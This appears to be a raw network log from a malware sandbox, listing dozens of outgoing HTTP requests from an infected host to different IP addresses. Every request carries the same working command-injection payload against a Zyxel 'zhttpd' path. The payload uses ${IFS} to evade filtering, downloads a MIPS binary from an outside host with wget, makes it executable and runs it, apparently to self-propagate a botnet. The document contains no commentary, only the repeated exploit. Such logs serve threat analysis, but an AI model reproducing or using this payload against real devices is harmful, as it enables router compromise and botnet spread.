                                            Jan 14, 2024 15:50:34.324474096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2757192.168.2.235511064.244.13.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324495077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2758192.168.2.2359128181.189.222.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324537039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2759192.168.2.23344285.159.169.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324564934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2760192.168.2.234357687.197.204.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324583054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2761192.168.2.2352446124.38.72.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324640989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2762192.168.2.2356044205.31.114.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324644089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2763192.168.2.2344960212.178.180.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324672937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2764192.168.2.2344726176.47.59.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324697971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2765192.168.2.2345690164.206.117.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324707031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2766192.168.2.233457074.238.46.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324738979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2767192.168.2.2345356141.205.56.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324770927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2768192.168.2.235611691.65.248.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324790955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2769192.168.2.233701475.24.146.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324821949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2770192.168.2.2340034185.244.251.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324841022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2771192.168.2.2349942110.81.235.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324883938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2772192.168.2.234319412.21.254.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324920893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2773192.168.2.2349436175.24.252.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324958086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2774192.168.2.2353086194.9.224.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324982882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2775192.168.2.233561491.26.243.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325011015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2776192.168.2.234678853.250.240.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325042009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2777192.168.2.2354726154.249.166.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325054884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2778192.168.2.2340996109.48.59.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325082064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2779192.168.2.2355496150.163.157.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325108051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2780192.168.2.234696246.85.141.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325119972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2781192.168.2.2354674217.68.199.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325122118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2782192.168.2.235951291.158.225.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325169086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2783192.168.2.2342022168.67.91.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325232029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2784192.168.2.2357344107.0.82.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325259924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2785192.168.2.2352166117.39.94.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325284958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2786192.168.2.2357996105.163.38.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325333118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2787192.168.2.2337914145.20.60.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325365067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2788192.168.2.2349172134.34.195.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325368881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2789192.168.2.235092289.209.231.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325402975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2790192.168.2.2348308107.125.183.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325436115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2791192.168.2.233475069.100.2.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325459957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2792192.168.2.2340056124.216.195.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325481892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2793192.168.2.235560250.57.134.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325510979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2794192.168.2.23338969.207.60.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325557947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2795192.168.2.234019298.69.175.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325587034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2796192.168.2.235800057.1.78.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325608015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2797192.168.2.2341682134.24.171.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325648069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2798192.168.2.234351237.123.106.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325687885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2799192.168.2.2337172188.23.140.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325746059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2800192.168.2.234863281.243.253.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325773954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2801192.168.2.2348234119.96.193.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325787067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2802192.168.2.236028440.119.190.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325828075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2803192.168.2.2341396160.140.255.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325845003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2804192.168.2.2336946159.57.87.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325880051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2805192.168.2.233777699.166.122.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325906992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2806192.168.2.2342594145.166.217.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325959921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2807192.168.2.2360006125.230.169.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.325984001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2808192.168.2.2336484179.21.45.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326019049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2809192.168.2.234205239.197.137.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326029062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2810192.168.2.2344240140.54.149.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326076031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2811192.168.2.234870062.90.47.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326107025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2812192.168.2.234561476.155.93.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326133966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2813192.168.2.2344276198.37.17.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326159000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2814192.168.2.234575227.33.16.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326203108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2815192.168.2.2335848199.221.152.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326224089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2816192.168.2.2359380184.119.71.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326253891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2817192.168.2.2343796171.176.183.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326294899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2818192.168.2.234166669.245.100.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.326323986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2819192.168.2.2342476122.153.23.211443
                                            TimestampBytes transferredDirectionData
